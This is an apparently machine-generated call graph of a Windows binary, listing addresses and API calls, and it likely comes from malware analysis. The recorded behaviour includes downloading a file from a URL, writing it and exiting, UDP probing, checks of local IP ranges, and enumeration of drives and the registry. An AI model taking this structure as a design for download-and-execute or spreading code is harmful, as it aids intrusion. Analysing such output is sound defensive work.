40d710 socket 4433->4951 4435 407a25 4446 406fe0 CoInitializeEx SysAllocString 4435->4446 4436 40d6e8 4995 40a2d0 4436->4995 4439 40d6aa 4976 40aa80 htons 4439->4976 4440 40d660 4440->4435 4440->4436 4440->4439 4961 40d980 4440->4961 4445 40e470 24 API calls 4445->4436 4447 407002 4446->4447 4448 407018 CoUninitialize 4446->4448 5140 407030 4447->5140 4448->4388 5149 40bec0 4451->5149 4454 40bec0 3 API calls 4455 40bf1e 4454->4455 4456 40bec0 3 API calls 4455->4456 4457 40bf2e 4456->4457 4458 40bec0 3 API calls 4457->4458 4459 407a42 4458->4459 4460 40d130 4459->4460 4461 409d90 7 API calls 4460->4461 4462 40d13b 4461->4462 4463 407a4c 4462->4463 4464 40d147 InitializeCriticalSection 4462->4464 4465 40b2c0 InitializeCriticalSection 4463->4465 4464->4463 4477 40b2da 4465->4477 4466 40b309 CreateFileW 4468 40b330 CreateFileMappingW 4466->4468 4470 40b3de 4466->4470 4469 40b351 MapViewOfFile 4468->4469 4468->4470 4469->4470 4473 40b36c GetFileSize 4469->4473 5205 40ab60 EnterCriticalSection 4470->5205 4480 40b38b 4473->4480 4474 40b3f7 4475 40d160 16 API calls 4474->4475 4478 407a56 4475->4478 4476 40b3d4 UnmapViewOfFile 4476->4470 4477->4466 5156 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4477->5156 5157 40aea0 4477->5157 4482 40d160 4478->4482 4480->4476 4481 40aea0 31 API calls 4480->4481 5204 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4480->5204 4481->4480 4483 40d177 EnterCriticalSection 4482->4483 4484 407a6f 4482->4484 5232 40d250 4483->5232 4484->4402 4487 40d23b LeaveCriticalSection 4487->4484 4488 409fe0 9 API calls 4489 40d1b9 4488->4489 4489->4487 4490 40d1cb CreateThread 4489->4490 4490->4487 4491 40d1ee 4490->4491 4492 40d212 GetCurrentProcess GetCurrentProcess DuplicateHandle 4491->4492 4493 40d234 4491->4493 4492->4493 4493->4487 4495 40d306 InterlockedExchangeAdd 4494->4495 4496 40d3e9 GetCurrentThread SetThreadPriority 4494->4496 4495->4496 4501 40d320 4495->4501 4496->4409 4497 40d339 EnterCriticalSection 4497->4501 4498 40d3a7 LeaveCriticalSection 4498->4501 4502 40d3be 4498->4502 4499 40d383 WaitForSingleObject 4499->4501 4500 40d3dc Sleep 4500->4501 4501->4496 4501->4497 4501->4498 4501->4499 4501->4500 4501->4502 4502->4496 4504 40d492 4503->4504 4505 40d41c EnterCriticalSection 4503->4505 4504->4364 4506 40d438 LeaveCriticalSection DeleteCriticalSection 4505->4506 4508 40a1b0 _invalid_parameter 3 API calls 4506->4508 4509 40d486 4508->4509 4510 40a1b0 _invalid_parameter 3 API calls 4509->4510 4510->4504 4514 40c3f0 4511->4514 4515 40c40e 4514->4515 4518 40c423 4514->4518 4520 40c450 4515->4520 4517 40796a 4517->4364 4517->4365 4518->4517 4546 40c5d0 4518->4546 4521 40c479 4520->4521 4522 40c502 4520->4522 4545 40c4fa 4521->4545 4580 409d90 4521->4580 4524 409d90 7 API calls 4522->4524 4522->4545 4526 40c528 4524->4526 4528 402420 7 API calls 4526->4528 4526->4545 4530 40c555 4528->4530 4532 4024e0 10 API calls 4530->4532 4534 40c56f 4532->4534 4533 40c4cf 4535 402420 7 API calls 4533->4535 4537 402420 7 API calls 4534->4537 4536 40c4e0 4535->4536 4538 4024e0 10 API calls 4536->4538 4539 40c580 4537->4539 4538->4545 4540 4024e0 10 API calls 4539->4540 4541 40c59a 4540->4541 4542 402420 7 API calls 4541->4542 4543 40c5ab 4542->4543 4544 4024e0 10 API calls 4543->4544 4544->4545 4545->4517 4547 40c5f9 4546->4547 4548 40c6aa 4546->4548 4549 40c6a2 4547->4549 4550 409d90 7 API calls 4547->4550 4548->4549 4552 409d90 7 API calls 4548->4552 4549->4517 4551 40c60f 4550->4551 4551->4549 4554 402420 7 API calls 4551->4554 4553 40c6ce 4552->4553 4553->4549 4556 402420 7 API calls 4553->4556 4555 40c633 4554->4555 4557 409d90 7 API calls 4555->4557 4558 40c6f2 4556->4558 4559 40c642 4557->4559 4560 409d90 7 API calls 4558->4560 4561 4024e0 10 API calls 4559->4561 4562 40c701 4560->4562 4563 40c66b 4561->4563 4564 4024e0 10 API calls 4562->4564 4565 40a1b0 _invalid_parameter 3 API calls 4563->4565 4566 40c72a 4564->4566 4567 40c677 4565->4567 4568 40a1b0 _invalid_parameter 3 API calls 4566->4568 4569 402420 7 API calls 4567->4569 4570 40c736 4568->4570 4572 40c688 4569->4572 4571 402420 7 API calls 4570->4571 4573 40c747 4571->4573 4574 4024e0 10 API calls 4572->4574 4575 4024e0 10 API calls 4573->4575 4574->4549 4576 40c761 4575->4576 4577 402420 7 API calls 4576->4577 4578 40c772 4577->4578 4579 4024e0 10 API calls 4578->4579 4579->4549 4591 409db0 4580->4591 4583 402420 4612 409fa0 4583->4612 4588 4024e0 4619 402540 4588->4619 4590 4024ff _invalid_parameter 4590->4533 4600 409e50 GetCurrentProcessId 4591->4600 4593 409dbb 4594 409dc7 __aligned_recalloc_base 4593->4594 4601 409e70 4593->4601 4595 409d9e 4594->4595 4597 409de2 HeapAlloc 4594->4597 4595->4545 4595->4583 4597->4595 4598 409e09 __aligned_recalloc_base 4597->4598 4598->4595 4599 409e24 memset 4598->4599 4599->4595 4600->4593 4609 409e50 GetCurrentProcessId 4601->4609 4603 409e79 4604 409e96 HeapCreate 4603->4604 4610 409ee0 GetProcessHeaps 4603->4610 4605 409eb0 HeapSetInformation GetCurrentProcessId 4604->4605 4606 409ed7 4604->4606 4605->4606 4606->4594 4609->4603 4611 409e8c 4610->4611 4611->4604 4611->4606 4613 409db0 __aligned_recalloc_base 7 API calls 4612->4613 4614 40242b 4613->4614 4615 402820 4614->4615 4616 40282a 4615->4616 4617 409fa0 __aligned_recalloc_base 7 API calls 4616->4617 4618 402438 4617->4618 4618->4588 4620 40258e 4619->4620 4622 402551 4619->4622 4621 409fa0 __aligned_recalloc_base 7 API calls 4620->4621 4620->4622 4625 4025b2 _invalid_parameter 4621->4625 4622->4590 4623 4025e2 memcpy 4624 402606 _invalid_parameter 4623->4624 4627 40a1b0 _invalid_parameter 3 API calls 4624->4627 4625->4623 4629 40a1b0 4625->4629 4627->4622 4636 409e50 GetCurrentProcessId 4629->4636 4631 40a1bb 4632 4025df 4631->4632 4637 40a0f0 4631->4637 4632->4623 4635 40a1d7 HeapFree 4635->4632 4636->4631 4638 40a120 HeapValidate 4637->4638 4639 40a140 4637->4639 4638->4639 4639->4632 4639->4635 4657 40a220 4640->4657 4643 40c861 4643->4429 4646 40a1b0 _invalid_parameter 3 API calls 4646->4643 4870 409fe0 4647->4870 4650 405d2a memcpy 4651 40a220 8 API calls 4650->4651 4652 405d61 4651->4652 4880 40c190 4652->4880 4655 405de8 4655->4429 4658 40a24d 4657->4658 4659 409fa0 __aligned_recalloc_base 7 API calls 4658->4659 4660 40a262 4658->4660 4661 40a264 memcpy 4658->4661 4659->4658 4660->4643 4662 40bd30 4660->4662 4661->4658 4670 40bd3a 4662->4670 4664 40bd59 4664->4643 4664->4646 4666 40bd71 memcmp 4666->4670 4667 40bd98 4668 40a1b0 _invalid_parameter 3 API calls 4667->4668 4668->4664 4669 40a1b0 _invalid_parameter 3 API calls 4669->4670 4670->4664 4670->4666 4670->4667 4670->4669 4671 40c220 4670->4671 4685 407af0 4670->4685 4672 40c22f __aligned_recalloc_base 4671->4672 4673 409fa0 __aligned_recalloc_base 7 API calls 4672->4673 4675 40c239 4672->4675 4674 40c2c8 4673->4674 4674->4675 4676 402420 7 API calls 4674->4676 4675->4670 4677 40c2dd 4676->4677 4678 402420 7 API calls 4677->4678 4679 40c2e5 4678->4679 4681 40c33d __aligned_recalloc_base 4679->4681 4688 40c390 4679->4688 4693 402470 4681->4693 4684 402470 3 API calls 4684->4675 4801 409d10 4685->4801 4689 4024e0 10 API calls 4688->4689 4690 40c3a4 4689->4690 4699 4026f0 4690->4699 4692 40c3bc 4692->4679 4694 4024ce 4693->4694 4697 402484 _invalid_parameter 4693->4697 4694->4684 4695 4024ac 4696 40a1b0 _invalid_parameter 3 API calls 4695->4696 4696->4694 4697->4695 4698 40a1b0 _invalid_parameter 3 API calls 4697->4698 4698->4695 4702 402710 4699->4702 4701 40270a 4701->4692 4703 402724 4702->4703 4704 402540 __aligned_recalloc_base 10 API calls 4703->4704 4705 40276d 4704->4705 4706 402540 __aligned_recalloc_base 10 API calls 4705->4706 4707 40277d 4706->4707 4708 402540 __aligned_recalloc_base 10 API calls 4707->4708 4709 40278d 4708->4709 4710 402540 __aligned_recalloc_base 10 API calls 4709->4710 4711 40279d 4710->4711 4712 4027a6 4711->4712 4713 4027cf 4711->4713 4717 403e20 4712->4717 4734 403df0 4713->4734 4716 4027c7 _invalid_parameter 4716->4701 4718 402820 _invalid_parameter 7 API calls 4717->4718 4719 403e37 4718->4719 4720 402820 _invalid_parameter 7 API calls 4719->4720 4721 403e46 4720->4721 4722 402820 _invalid_parameter 7 API calls 4721->4722 4723 403e55 4722->4723 4724 402820 _invalid_parameter 7 API calls 4723->4724 4733 403e64 _invalid_parameter 4724->4733 4726 40400f _invalid_parameter 4727 402850 _invalid_parameter 3 API calls 4726->4727 4728 404035 _invalid_parameter 4726->4728 4727->4726 4729 402850 _invalid_parameter 3 API calls 4728->4729 4730 40405b _invalid_parameter 4728->4730 4729->4728 4731 402850 _invalid_parameter 3 API calls 4730->4731 4732 404081 4730->4732 4731->4730 4732->4716 4733->4726 4737 402850 4733->4737 4741 404090 4734->4741 4736 403e0c 4736->4716 4738 402866 4737->4738 4739 40285b 4737->4739 4738->4733 4740 40a1b0 _invalid_parameter 3 API calls 4739->4740 4740->4738 4742 4040a6 _invalid_parameter 4741->4742 4743 4040b8 _invalid_parameter 4742->4743 4744 4040dd 4742->4744 4746 404103 4742->4746 4743->4736 4771 403ca0 4744->4771 4747 40413d 4746->4747 4748 40415e 4746->4748 4781 404680 4747->4781 4750 402820 _invalid_parameter 7 API calls 4748->4750 4751 40416f 4750->4751 4752 402820 _invalid_parameter 7 API calls 4751->4752 4753 40417e 4752->4753 4754 402820 _invalid_parameter 7 API calls 4753->4754 4755 40418d 4754->4755 4756 402820 _invalid_parameter 7 API calls 4755->4756 4757 40419c 4756->4757 4794 403d70 4757->4794 4759 402820 _invalid_parameter 7 API calls 4760 4041ca _invalid_parameter 4759->4760 4760->4759 4761 404284 _invalid_parameter 4760->4761 4762 402850 _invalid_parameter 3 API calls 4761->4762 4763 4045a3 _invalid_parameter 4761->4763 4762->4761 4764 402850 _invalid_parameter 3 API calls 4763->4764 4765 4045c9 _invalid_parameter 4763->4765 4764->4763 4766 402850 _invalid_parameter 3 API calls 4765->4766 4767 4045ef _invalid_parameter 4765->4767 4766->4765 4768 402850 _invalid_parameter 3 API calls 4767->4768 4769 404615 _invalid_parameter 4767->4769 4768->4767 4769->4743 4770 402850 _invalid_parameter 3 API calls 4769->4770 4770->4769 4772 403cae 4771->4772 4773 402820 _invalid_parameter 7 API calls 4772->4773 4774 403ccb 4773->4774 4775 402820 _invalid_parameter 7 API calls 4774->4775 4776 403cda _invalid_parameter 4775->4776 4777 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4776->4777 4778 403d3a _invalid_parameter 4776->4778 4777->4776 4779 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4778->4779 4780 403d60 4778->4780 4779->4778 4780->4743 4782 402820 _invalid_parameter 7 API calls 4781->4782 4783 404697 4782->4783 4784 402820 _invalid_parameter 7 API calls 4783->4784 4785 4046a6 4784->4785 4786 402820 _invalid_parameter 7 API calls 4785->4786 4787 4046b5 _invalid_parameter 4786->4787 4788 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4787->4788 4790 404841 _invalid_parameter 4787->4790 4788->4787 4789 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4789->4790 4790->4789 4791 404867 _invalid_parameter 4790->4791 4792 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4791->4792 4793 40488d 4791->4793 4792->4791 4793->4743 4795 402820 _invalid_parameter 7 API calls 4794->4795 4796 403d7f _invalid_parameter 4795->4796 4797 403ca0 _invalid_parameter 9 API calls 4796->4797 4798 403db8 _invalid_parameter 4797->4798 4799 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4798->4799 4800 403de3 4798->4800 4799->4798 4800->4760 4802 409d22 4801->4802 4805 409c70 4802->4805 4806 409fa0 __aligned_recalloc_base 7 API calls 4805->4806 4811 409c80 4806->4811 4807 407b0f 4807->4670 4809 409cbc 4812 40a1b0 _invalid_parameter 3 API calls 4809->4812 4811->4807 4811->4809 4814 4091a0 4811->4814 4821 409790 4811->4821 4826 409b60 4811->4826 4812->4807 4815 4091b3 4814->4815 4820 4091a9 4814->4820 4816 4091f6 memset 4815->4816 4815->4820 4817 409217 4816->4817 4816->4820 4818 40921d memcpy 4817->4818 4817->4820 4834 408f70 4818->4834 4820->4811 4822 40979d 4821->4822 4823 4097a7 4821->4823 4822->4811 4823->4822 4824 40989f memcpy 4823->4824 4839 4094c0 4823->4839 4824->4823 4827 409b6c 4826->4827 4830 409b76 4826->4830 4827->4811 4828 4094c0 64 API calls 4829 409bf7 4828->4829 4829->4827 4831 408f70 6 API calls 4829->4831 4830->4827 4830->4828 4832 409c16 4831->4832 4832->4827 4833 409c2b memcpy 4832->4833 4833->4827 4835 408fbe 4834->4835 4837 408f7e 4834->4837 4835->4820 4837->4835 4838 408eb0 6 API calls 4837->4838 4838->4837 4840 4094da 4839->4840 4843 4094d0 4839->4843 4840->4843 4849 409300 4840->4849 4843->4823 4844 409618 memcpy 4844->4843 4846 409637 memcpy 4847 409761 4846->4847 4848 4094c0 62 API calls 4847->4848 4848->4843 4850 40930d 4849->4850 4851 409317 4849->4851 4850->4843 4850->4844 4850->4846 4851->4850 4852 4093a0 4851->4852 4853 4093a5 4851->4853 4854 409388 4851->4854 4860 408c60 4852->4860 4857 408f70 6 API calls 4853->4857 4856 408f70 6 API calls 4854->4856 4856->4852 4857->4852 4859 40944c memset 4859->4850 4861 408c6f 4860->4861 4862 408c79 4860->4862 4861->4850 4861->4859 4862->4861 4863 408b30 9 API calls 4862->4863 4864 408d72 4863->4864 4865 409fa0 __aligned_recalloc_base 7 API calls 4864->4865 4866 408dc1 4865->4866 4866->4861 4867 4089a0 46 API calls 4866->4867 4868 408dee 4867->4868 4869 40a1b0 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4868->4869 4869->4861 4889 409e50 GetCurrentProcessId 4870->4889 4872 409feb 4873 409e70 __aligned_recalloc_base 5 API calls 4872->4873 4877 409ff7 __aligned_recalloc_base 4872->4877 4873->4877 4874 40a0f0 _invalid_parameter HeapValidate 4874->4877 4875 40a0a0 HeapAlloc 4875->4877 4876 40a06a HeapReAlloc 4876->4877 4877->4874 4877->4875 4877->4876 4878 40a1b0 _invalid_parameter 3 API calls 4877->4878 4879 405d15 4877->4879 4878->4877 4879->4650 4879->4655 4882 40c19b 4880->4882 4881 409fa0 __aligned_recalloc_base 7 API calls 4881->4882 4882->4881 4883 405dad 4882->4883 4883->4655 4884 407310 4883->4884 4885 409fa0 __aligned_recalloc_base 7 API calls 4884->4885 4886 407320 4885->4886 4887 407367 4886->4887 4888 40732c memcpy CreateThread 4886->4888 4887->4655 4888->4887 4890 407370 GetTickCount srand rand Sleep 4888->4890 4889->4872 4891 4073a7 4890->4891 4892 4073fd 4890->4892 4895 4073b6 StrChrA 4891->4895 4896 4073fb 4891->4896 4900 40eae0 9 API calls 4891->4900 4893 40eae0 56 API calls 4892->4893 4892->4896 4893->4896 4894 40a1b0 _invalid_parameter 3 API calls 4897 407428 4894->4897 4895->4891 4896->4894 4901 40ed03 InternetCloseHandle Sleep 4900->4901 4902 40eba3 InternetOpenUrlW 4900->4902 4905 40ed2a 6 API calls 4901->4905 4922 4073e5 Sleep 4901->4922 4903 40ebd2 CreateFileW 4902->4903 4904 40ecf6 InternetCloseHandle 4902->4904 4907 40ec01 InternetReadFile 4903->4907 4926 40ecd3 4903->4926 4904->4901 4906 40eda6 wsprintfW DeleteFileW 4905->4906 4905->4922 4908 40e7c0 18 API calls 4906->4908 4909 40ec54 wsprintfW DeleteFileW 4907->4909 4910 40ec25 4907->4910 4911 40eddb 4908->4911 4928 40e7c0 CreateFileW 4909->4928 4910->4909 4912 40ec2e WriteFile 4910->4912 4914 40ede5 Sleep 4911->4914 4915 40ee19 DeleteFileW 4911->4915 4912->4907 4917 40e980 6 API calls 4914->4917 4915->4922 4919 40edfc 4917->4919 4919->4922 4924 40ee0f ExitProcess 4919->4924 4920 40eca0 Sleep 4923 40e980 6 API calls 4920->4923 4921 40ecdc DeleteFileW 4921->4926 4922->4891 4925 40ecb7 4923->4925 4925->4926 4927 40eccb ExitProcess 4925->4927 4926->4904 4929 40e805 CreateFileMappingW 4928->4929 4930 40e906 4928->4930 4929->4930 4931 40e826 MapViewOfFile 4929->4931 4932 40e920 CreateFileW 4930->4932 4940 40e971 4930->4940 4931->4930 4933 40e845 GetFileSize 4931->4933 4934 40e942 WriteFile 4932->4934 4935 40e968 4932->4935 4936 40e861 4933->4936 4937 40e8fc UnmapViewOfFile 4933->4937 4934->4935 4938 40a1b0 _invalid_parameter 3 API calls 4935->4938 4948 40c7f0 4936->4948 4937->4930 4938->4940 4940->4920 4940->4921 4942 40c190 7 API calls 4943 40e8b0 4942->4943 4943->4937 4944 40e8cd memcmp 4943->4944 4944->4937 4945 40e8e9 4944->4945 4946 40a1b0 _invalid_parameter 3 API calls 4945->4946 4947 40e8f2 4946->4947 4947->4937 4949 40c220 10 API calls 4948->4949 4950 40c814 4949->4950 4950->4937 4950->4942 4952 40d73d htons inet_addr setsockopt 4951->4952 4957 40d86e 4951->4957 4953 40aa80 8 API calls 4952->4953 4954 40d7b6 bind lstrlenA sendto ioctlsocket 4953->4954 4960 40d80b 4954->4960 4957->4440 4958 40d832 5008 40ab40 shutdown closesocket 4958->5008 4959 409fe0 9 API calls 4959->4960 4960->4958 4960->4959 4999 40d890 4960->4999 5015 40dbc0 memset InternetCrackUrlA InternetOpenA 4961->5015 4964 40da9e 4964->4440 4967 40a1b0 _invalid_parameter 3 API calls 4967->4964 4968 40da6b 4968->4967 4973 40da61 SysFreeString 4973->4968 5122 40aa40 inet_addr 4976->5122 4979 40ab2d 4984 40e470 4979->4984 4980 40aadc connect 4981 40aaf0 getsockname 4980->4981 4982 40ab24 4980->4982 4981->4982 5125 40ab40 shutdown closesocket 4982->5125 5126 40aa20 inet_ntoa 4984->5126 4986 40e486 4987 40c9f0 11 API calls 4986->4987 4988 40e4a5 4987->4988 4989 40d6cc 4988->4989 5127 40e4f0 memset InternetCrackUrlA InternetOpenA 4988->5127 4989->4445 4992 40e4dc 4994 40a1b0 _invalid_parameter 3 API calls 4992->4994 4993 40a1b0 _invalid_parameter 3 API calls 4993->4992 4994->4989 4998 40a2d4 4995->4998 4996 40a2da 4996->4435 4997 40a1b0 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 4997->4998 4998->4996 4998->4997 5004 40d8ac 4999->5004 5000 40d974 5000->4960 5001 40d8c8 recvfrom 5002 40d8f6 StrCmpNIA 5001->5002 5003 40d8e9 Sleep 5001->5003 5002->5004 5005 40d915 StrStrIA 5002->5005 5003->5004 5004->5000 5004->5001 5005->5004 5006 40d936 StrChrA 5005->5006 5009 40c8a0 5006->5009 5008->4957 5010 40c8ab 5009->5010 5011 40c8b1 lstrlenA 5010->5011 5012 409fa0 __aligned_recalloc_base 7 API calls 5010->5012 5013 40c8e0 memcpy 5010->5013 5014 40c8c4 5010->5014 5011->5010 5011->5014 5012->5010 5013->5010 5013->5014 5014->5004 5016 40dc61 InternetConnectA 5015->5016 5017 40d99a 5015->5017 5018 40ddca InternetCloseHandle 5016->5018 5019 40dc9a HttpOpenRequestA 5016->5019 5017->4964 5028 40dab0 5017->5028 5018->5017 5020 40dcd0 HttpSendRequestA 5019->5020 5021 40ddbd InternetCloseHandle 5019->5021 5022 40ddb0 InternetCloseHandle 5020->5022 5024 40dced 5020->5024 5021->5018 5022->5021 5023 40dd0e InternetReadFile 5023->5024 5025 40dd3b 5023->5025 5024->5023 5024->5025 5026 409fe0 9 API calls 5024->5026 5025->5022 5027 40dd56 memcpy 5026->5027 5027->5024 5057 405690 5028->5057 5031 40d9b3 5031->4968 5038 40e420 5031->5038 5032 40dada SysAllocString 5033 40daf1 CoCreateInstance 5032->5033 5034 40dba7 5032->5034 5035 40db9d SysFreeString 5033->5035 5037 40db16 5033->5037 5036 40a1b0 _invalid_parameter 3 API calls 5034->5036 5035->5034 5036->5031 5037->5035 5074 40df70 5038->5074 5041 40ddf0 5079 40e240 5041->5079 5046 40e3a0 6 API calls 5047 40de47 5046->5047 5053 40da32 5047->5053 5096 40e060 5047->5096 5050 40de7f 5050->5053 5101 40df10 5050->5101 5051 40e060 6 API calls 5051->5050 5053->4973 5054 40c9f0 5053->5054 5117 40c960 5054->5117 5062 40569d 5057->5062 5058 4056a3 lstrlenA 5058->5062 5063 4056b6 5058->5063 5060 409fa0 __aligned_recalloc_base 7 API calls 5060->5062 5062->5058 5062->5060 5062->5063 5064 40a1b0 _invalid_parameter 3 API calls 5062->5064 5065 405630 5062->5065 5069 4055e0 5062->5069 5063->5031 5063->5032 5064->5062 5066 405647 MultiByteToWideChar 5065->5066 5067 40563a lstrlenA 5065->5067 5068 40566c 5066->5068 5067->5066 5068->5062 5072 4055eb 5069->5072 5070 4055f1 lstrlenA 5070->5072 5071 405630 2 API calls 5071->5072 5072->5070 5072->5071 5073 405627 5072->5073 5073->5062 5077 40df96 5074->5077 5075 40da1d 5075->4968 5075->5041 5076 40e013 lstrcmpiW 5076->5077 5078 40e02b SysFreeString 5076->5078 5077->5075 5077->5076 5077->5078 5078->5077 5081 40e266 5079->5081 5080 40de0b 5080->5053 5091 40e3a0 5080->5091 5081->5080 5082 40e2f3 lstrcmpiW 5081->5082 5083 40e373 SysFreeString 5082->5083 5084 40e306 5082->5084 5083->5080 5085 40df10 2 API calls 5084->5085 5087 40e314 5085->5087 5086 40e365 5086->5083 5087->5083 5087->5086 5088 40e343 lstrcmpiW 5087->5088 5089 40e355 5088->5089 5090 40e35b SysFreeString 5088->5090 5089->5090 5090->5086 5092 40df10 2 API calls 5091->5092 5094 40e3bb 5092->5094 5093 40de29 5093->5046 5093->5053 5094->5093 5095 40e240 6 API calls 5094->5095 5095->5093 5097 40df10 2 API calls 5096->5097 5099 40e07b 5097->5099 5098 40de65 5098->5050 5098->5051 5099->5098 5105 40e0e0 5099->5105 5102 40df36 5101->5102 5103 40df70 2 API calls 5102->5103 5104 40df4d 5102->5104 5103->5104 5104->5053 5106 40e106 5105->5106 5107 40e21d 5106->5107 5108 40e193 lstrcmpiW 5106->5108 5107->5098 5109 40e213 SysFreeString 5108->5109 5110 40e1a6 5108->5110 5109->5107 5111 40df10 2 API calls 5110->5111 5113 40e1b4 5111->5113 5112 40e205 5112->5109 5113->5109 5113->5112 5114 40e1e3 lstrcmpiW 5113->5114 5115 40e1f5 5114->5115 5116 40e1fb SysFreeString 5114->5116 5115->5116 5116->5112 5119 40c96d 5117->5119 5118 40c910 _vscprintf wvsprintfA 5118->5119 5119->5118 5120 409fe0 9 API calls 5119->5120 5121 40c988 SysFreeString 5119->5121 5120->5119 5121->4973 5123 40aa6c socket 5122->5123 5124 40aa59 gethostbyname 5122->5124 5123->4979 5123->4980 5124->5123 5125->4979 5126->4986 5128 40e4c7 5127->5128 5129 40e594 InternetConnectA 5127->5129 5128->4992 5128->4993 5130 40e714 InternetCloseHandle 5129->5130 5131 40e5cd HttpOpenRequestA 5129->5131 5130->5128 5132 40e603 HttpAddRequestHeadersA HttpSendRequestA 5131->5132 5133 40e707 InternetCloseHandle 5131->5133 5134 40e6fa InternetCloseHandle 5132->5134 5137 40e64d 5132->5137 5133->5130 5134->5133 5135 40e664 InternetReadFile 5136 40e691 5135->5136 5135->5137 5136->5134 5137->5135 5137->5136 5138 409fe0 9 API calls 5137->5138 5139 40e6ac memcpy 5138->5139 5139->5137 5145 407067 5140->5145 5141 40723b 5143 407244 SysFreeString 5141->5143 5144 40700b SysFreeString 5141->5144 5142 40a1b0 _invalid_parameter 3 API calls 5142->5141 5143->5144 5144->4448 5146 4072c0 CoCreateInstance 5145->5146 5147 4071b6 SysAllocString 5145->5147 5148 407082 5145->5148 5146->5145 5147->5145 5147->5148 5148->5141 5148->5142 5150 40beca 5149->5150 5151 40bece 5149->5151 5150->4454 5153 40be80 CryptAcquireContextW 5151->5153 5154 40bebb 5153->5154 5155 40be9d CryptGenRandom CryptReleaseContext 5153->5155 5154->5150 5155->5154 5156->4477 5208 40add0 gethostname 5157->5208 5160 40aeb9 5160->4477 5162 40aecc strcmp 5162->5160 5163 40aee1 5162->5163 5212 40aa20 inet_ntoa 5163->5212 5165 40aeef strstr 5166 40af40 5165->5166 5167 40aeff 5165->5167 5215 40aa20 inet_ntoa 5166->5215 5213 40aa20 inet_ntoa 5167->5213 5170 40af0d strstr 5170->5160 5172 40af1d 5170->5172 5171 40af4e strstr 5173 40af5e 5171->5173 5174 40af9f 5171->5174 5214 40aa20 inet_ntoa 5172->5214 5216 40aa20 inet_ntoa 5173->5216 5218 40aa20 inet_ntoa 5174->5218 5178 40af6c strstr 5178->5160 5181 40af7c 5178->5181 5179 40afad strstr 5182 40afbd 5179->5182 5183 40affe EnterCriticalSection 5179->5183 5180 40af2b strstr 5180->5160 5180->5166 5217 40aa20 inet_ntoa 5181->5217 5219 40aa20 inet_ntoa 5182->5219 5184 40b016 5183->5184 5193 40b041 5184->5193 5221 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5184->5221 5187 40af8a strstr 5187->5160 5187->5174 5188 40afcb strstr 5188->5160 5189 40afdb 5188->5189 5220 40aa20 inet_ntoa 5189->5220 5192 40b13a LeaveCriticalSection 5192->5160 5193->5192 5195 409d90 7 API calls 5193->5195 5194 40afe9 strstr 5194->5160 5194->5183 5196 40b085 5195->5196 5196->5192 5222 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5196->5222 5198 40b0a3 5199 40b0d0 5198->5199 5200 40b0c6 Sleep 5198->5200 5202 40b0f5 5198->5202 5201 40a1b0 _invalid_parameter 3 API calls 5199->5201 5200->5198 5201->5202 5202->5192 5223 40ab80 5202->5223 5204->4480 5206 40ab80 13 API calls 5205->5206 5207 40ab73 LeaveCriticalSection 5206->5207 5207->4474 5209 40adf7 gethostbyname 5208->5209 5210 40ae13 5208->5210 5209->5210 5210->5160 5211 40aa20 inet_ntoa 5210->5211 5211->5162 5212->5165 5213->5170 5214->5180 5215->5171 5216->5178 5217->5187 5218->5179 5219->5188 5220->5194 5221->5193 5222->5198 5224 40ab94 5223->5224 5225 40ab8f 5223->5225 5226 409fa0 __aligned_recalloc_base 7 API calls 5224->5226 5225->5192 5228 40aba8 5226->5228 5227 40ac04 CreateFileW 5229 40ac53 InterlockedExchange 5227->5229 5230 40ac27 WriteFile FlushFileBuffers 5227->5230 5228->5225 5228->5227 5231 40a1b0 _invalid_parameter 3 API calls 5229->5231 5230->5229 5231->5225 5233 40d25d 5232->5233 5234 40d193 5233->5234 5235 40d281 WaitForSingleObject 5233->5235 5234->4487 5234->4488 5235->5233 5239 407490 5236->5239 5237 4074b8 Sleep 5237->5239 5238 40756a Sleep 5238->5239 5239->5237 5239->5238 5240 4074e7 Sleep wsprintfA DeleteUrlCacheEntry 5239->5240 5242 40eae0 56 API calls 5239->5242 5266 40ea30 InternetOpenA 5240->5266 5242->5239 5244 405889 memset GetModuleHandleW 5243->5244 5245 4058c2 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5244->5245 5245->5245 5246 405900 CreateWindowExW 5245->5246 5247 40592b 5246->5247 5248 40592d GetMessageA 5246->5248 5249 40595f ExitThread 5247->5249 5250 405941 TranslateMessage DispatchMessageA 5248->5250 5251 405957 5248->5251 5250->5248 5251->5244 5251->5249 5273 40e770 CreateFileW 5252->5273 5254 406d48 ExitThread 5256 406bf0 5256->5254 5257 406d38 Sleep 5256->5257 5258 406c29 5256->5258 5276 4063a0 GetLogicalDrives 5256->5276 5257->5256 5282 4062c0 5258->5282 5261 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5262 406cd6 wsprintfW 5261->5262 5263 406ceb wsprintfW 5261->5263 5262->5263 5288 4066b0 _chkstk 5263->5288 5265 406c5b 5267 40ea56 InternetOpenUrlA 5266->5267 5268 40eac8 Sleep 5266->5268 5269 40ea75 HttpQueryInfoA 5267->5269 5270 40eabe InternetCloseHandle 5267->5270 5268->5239 5271 40eab4 InternetCloseHandle 5269->5271 5272 40ea9e 5269->5272 5270->5268 5271->5270 5272->5271 5274 40e7b8 5273->5274 5275 40e79f GetFileSize 5273->5275 5274->5256 5275->5274 5281 4063cd 5276->5281 5277 406446 5277->5256 5278 4063dc RegOpenKeyExW 5279 4063fe RegQueryValueExW 5278->5279 5278->5281 5280 40643a RegCloseKey 5279->5280 5279->5281 5280->5281 5281->5277 5281->5278 5281->5280 5283 406319 5282->5283 5284 4062dc 5282->5284 5283->5261 5283->5265 5325 406320 GetDriveTypeW 5284->5325 5287 40630b lstrcpyW 5287->5283 5289 4066ce 6 API calls 5288->5289 5301 4066c7 5288->5301 5290 406782 5289->5290 5291 4067c4 PathFileExistsW 5289->5291 5294 40e770 2 API calls 5290->5294 5292 406874 PathFileExistsW 5291->5292 5293 4067d9 PathFileExistsW 5291->5293 5297 406885 5292->5297 5298 4068ca 